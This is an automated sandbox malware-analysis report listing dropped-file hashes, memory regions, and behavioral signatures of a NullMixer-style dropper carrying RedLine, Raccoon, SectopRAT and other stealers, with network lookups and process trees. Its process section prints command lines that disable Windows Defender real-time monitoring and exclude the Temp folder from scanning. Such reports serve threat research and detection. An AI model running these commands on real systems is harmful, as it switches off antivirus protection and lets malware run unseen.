memory/4472-213-0x00000000068B0000-0x00000000068CE000-memory.dmp
memory/2916-218-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4472-203-0x000000006C6C0000-0x000000006C70C000-memory.dmp
memory/4472-202-0x0000000007290000-0x00000000072C2000-memory.dmp
memory/4536-200-0x0000000005100000-0x0000000005112000-memory.dmp
memory/4536-199-0x00000000055F0000-0x0000000005C08000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe
| MD5 | 6b4f4e37bc557393a93d254fe4626bf3 |
| SHA1 | b9950d0223789ae109b43308fcaf93cd35923edb |
| SHA256 | 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d |
| SHA512 | a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e |
memory/3780-145-0x00000000054E0000-0x0000000005A84000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aowvgb3s.rzp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4472-119-0x0000000005430000-0x0000000005452000-memory.dmp
memory/4472-120-0x0000000005C30000-0x0000000005C96000-memory.dmp
memory/3780-118-0x0000000004D90000-0x0000000004DAE000-memory.dmp
memory/744-117-0x0000000000E80000-0x0000000000E86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe
| MD5 | 3bf8a169c55f8b54700880baee9099d7 |
| SHA1 | d411f875744aa2cfba6d239bad723cbff4cf771a |
| SHA256 | 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2 |
| SHA512 | f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11 |
memory/4752-112-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4028-284-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4572-283-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3012-105-0x0000000000110000-0x0000000000182000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
memory/744-103-0x0000000000700000-0x0000000000716000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe
| MD5 | e90750ecf7d4add59391926ccfc15f51 |
| SHA1 | 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1 |
| SHA256 | b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59 |
| SHA512 | 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9 |
memory/3516-81-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3516-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3516-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3516-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3516-74-0x000000006494A000-0x000000006494F000-memory.dmp
memory/3516-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3516-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3516-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3516-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3516-65-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3516-63-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/760-285-0x0000000002410000-0x000000000256D000-memory.dmp
memory/2828-286-0x0000000002720000-0x000000000287D000-memory.dmp
memory/2828-287-0x0000000002C30000-0x0000000002CD6000-memory.dmp
memory/2828-291-0x0000000002CE0000-0x0000000002D73000-memory.dmp
memory/2828-289-0x0000000002CE0000-0x0000000002D73000-memory.dmp
memory/760-314-0x0000000002AD0000-0x0000000002B63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2988 wrote to memory of 3248 | N/A | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe |
| PID 2988 wrote to memory of 3248 | N/A | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe |
| PID 2988 wrote to memory of 3248 | N/A | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"
C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe" -u
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20241010-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2496 set thread context of 2436 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe |
| PID 1404 set thread context of 2948 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe |
| PID 612 set thread context of 2844 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe
Tue19cd42a7c874e44.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe
Tue19c28f648204dbd4.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe
Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe
Tue19cef5687a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe
Tue197e9ec0ff0.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe
Tue196397c0f84f8.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe
Tue19ac3c92c21.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe
Tue1932df4dae.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe
